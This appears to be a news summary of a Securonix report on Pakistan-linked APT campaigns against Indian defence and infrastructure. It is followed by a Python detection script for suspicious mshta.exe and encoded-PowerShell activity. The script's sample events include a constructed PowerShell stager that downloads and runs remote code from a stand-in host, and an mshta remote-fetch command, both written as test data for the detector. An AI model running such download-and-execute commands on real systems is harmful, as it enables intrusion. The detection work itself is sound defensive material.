Security

In its May 2025 report, Securonix Threat Labs flagged a sharp surge in cyberattacks on Indian digital infrastructure, with activity traced primarily to Pakistan-linked APT groups, notably APT36 (Transparent Tribe) and SideCopy. The report highlights a series of sophisticated campaigns (ClickFix, Operation Sindoor, and the cyber offensives that followed the Baisaran Valley attack) targeting India's defense, telecom, healthcare, and government sectors.
The report states that Securonix Autonomous Threat Sweeper analyzed 3,059 TTPs and IoCs, identified 173 emerging threats, and escalated 4 major incidents in May. These threats primarily leveraged phishing, spoofed websites, and malicious Office documents to gain unauthorized access and steal sensitive data.
Operation Sindoor: A Coordinated Cyber Siege
A highly organized campaign, Operation Sindoor blended espionage with hacktivism. It used spear-phishing emails containing malicious .ppam, .lnk, and .msi files to infiltrate systems belonging to the Indian Ministry of Defence, DRDO, BSNL, Jio, AIIMS, and other critical entities. Attackers used LOLbins (living-off-the-land binaries), PowerShell obfuscation, UAC bypass, and Ares RAT for long-term persistence and control. Over 35 hacktivist groups collaborated on DDoS attacks and website defacements, coordinated via Telegram under hashtags like #OpIndia and #OperationSindoor.
ClickFix Campaign: Ministry of Defence Spoof
APT36 launched the ClickFix campaign by cloning government websites and seeding them with malicious links. Clicking the fake "March 2025" link triggered a platform-specific payload: on Windows, an .hta file downloaded a .NET-based loader; on Linux, the victim was walked through a fake CAPTCHA that executed a shell script disguised as an image file.
Post-Baisaran Valley Attack Surge
Following the April 22 terrorist attack in Pahalgam, cyberattacks intensified. Threat actors distributed malicious documents titled “Report & Update Regarding Pahalgam Terror Attack.ppam” to spread Crimson RAT, a remote access trojan used for credential theft and surveillance.
Securonix recommends implementing advanced email security, monitoring for malicious macros, blocking known threat domains, and tightening controls on PowerShell and mshta.exe usage (the two binaries abused in the ClickFix and Operation Sindoor chains). The Threat Labs team has published 139 IoCs to help enterprises detect and defend against these attacks.
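The following is an added example, not code from Securonix or from the report, showing what "tightening controls on PowerShell and mshta.exe usage" can look like as detection logic. It runs over a handful of constructed process-creation events (Sysmon Event ID 1 style fields; the hostnames, paths and the example.invalid URLs are made up) and flags the patterns described above: mshta.exe pulling remote content, Office or browser processes spawning a script host, and Base64-encoded PowerShell, which it decodes so the analyst sees the real command.

```python
import base64
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Process names used as parent/child indicators. These sets are an assumption
# for the example; tune them to the software actually present in the estate.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "msiexec.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|FromBase64String",
    re.I,
)

# Constructed stager, encoded the way PowerShell expects (UTF-16LE, then Base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed sample telemetry, not real events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": "mshta.exe https://example.invalid/march2025.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"Image": r"C:\Windows\explorer.exe",                     # benign logon
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",                # benign admin use
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event is suspicious (empty means clean)."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons: List[str] = []
    if image == "mshta.exe":
        reasons.append("mshta.exe execution")
        if URL_RE.search(cmd):
            reasons.append("mshta.exe loading remote content")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"Office application {parent} spawned {image}")
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        reasons.append(f"browser {parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded PowerShell command")
            if DOWNLOAD_RE.search(decoded):
                reasons.append("decoded command downloads or evaluates remote code")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            reasons.append("hidden PowerShell window")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that trips at least one rule."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze_event(ev))]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
        dec = decode_encoded_command(SAMPLE_EVENTS[idx]["CommandLine"])
        if dec:
            print(f"  decoded: {dec}")
```

The two benign events (an interactive logon and a scheduled backup script run by an administrator) produce no alerts, which is the point of keying on parent process and encoding rather than on powershell.exe alone: a blanket block breaks administration, while the parent-child and encoded-command rules match the phishing-document and ClickFix chains described in the report.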
The report underscores growing concerns around state-sponsored cyberattacks, Pakistan-linked threat actors, and the escalating cyber conflict targeting Indian defense and infrastructure sectors.